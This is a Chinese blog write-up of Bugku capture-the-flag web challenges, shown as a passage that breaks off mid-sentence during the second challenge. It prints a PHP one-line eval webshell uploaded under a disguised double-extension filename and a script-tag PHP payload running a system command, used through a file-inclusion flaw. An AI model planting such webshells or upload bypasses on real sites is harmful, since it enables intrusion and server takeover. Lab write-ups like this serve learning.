bugku web 系列题目思路总结(七)

本文总结了Bugku平台的三个Web安全挑战,包括文件包含漏洞利用,通过GET参数获取源码并解密FLAG,以及SQL注入题目中的.DS_Store源码泄露。涉及知识点有上传木马、URL转码、.DS_Store文件利用和信息收集技巧。
摘要由CSDN通过智能技术生成

bugku 文件包含2

查看源码,有upload.php,结合题目应该是关键信息。进入
上传文件。
参考博客: https://blog.csdn.net/qq_33417843/article/details/79756682
第一种方法:上传一句话木马,<?=eval($_POST['shell']);> 上传文件1.php;.jpg。
链接菜刀失败。
第二种方法,构造语句<script language=php>system("ls")</script>
由于恰好flag文件在根目录,在访问这个文件即可得到密码。
访问文件方法:

  1. 直接域名访问。 http://123.206.31.85:49166/upload/201908100534091751.jpg
  2. 包含文件访问 http://123.206.31.85:49166/index.php?file=upload/201908100534091751.jpg

题过了,菜刀还是不会用。

bugku flag.php

点了Login没反应,一开始以为是要在post里添加 summit=Login才能用,发现不对。
提示hint。直接用get方法提交hint参数(任意)。得到代码源代码。
源码要求:
hint作为参数需要存在 且 cookie 包含 ISecer 其值反序列化后的值为 $key。
这里重点是,结尾给出了key值,然后在程序运行时,判

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值